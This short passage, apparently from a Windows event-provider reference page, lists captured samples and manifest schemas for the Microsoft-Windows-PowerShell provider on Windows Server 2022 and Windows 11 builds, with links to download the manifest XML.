- WS2022-20348.4893 · sample captured from a live trace · binary version 10.0.20348.2849 · captured 2026-06-02
- WS2022-20348.4893 · schema read from the registered manifest · binary version 10.0.20348.2849 · captured 2026-06-02
- Win11-26200.6584 · schema read from the registered manifest · binary version 10.0.26100.1 · captured 2026-06-02
Downloads
- Microsoft-Windows-PowerShell registered manifest XML (WS2022-20348.4893) manifest-xml
- Microsoft-Windows-PowerShell registered manifest XML (Win11-26200.6584) manifest-xml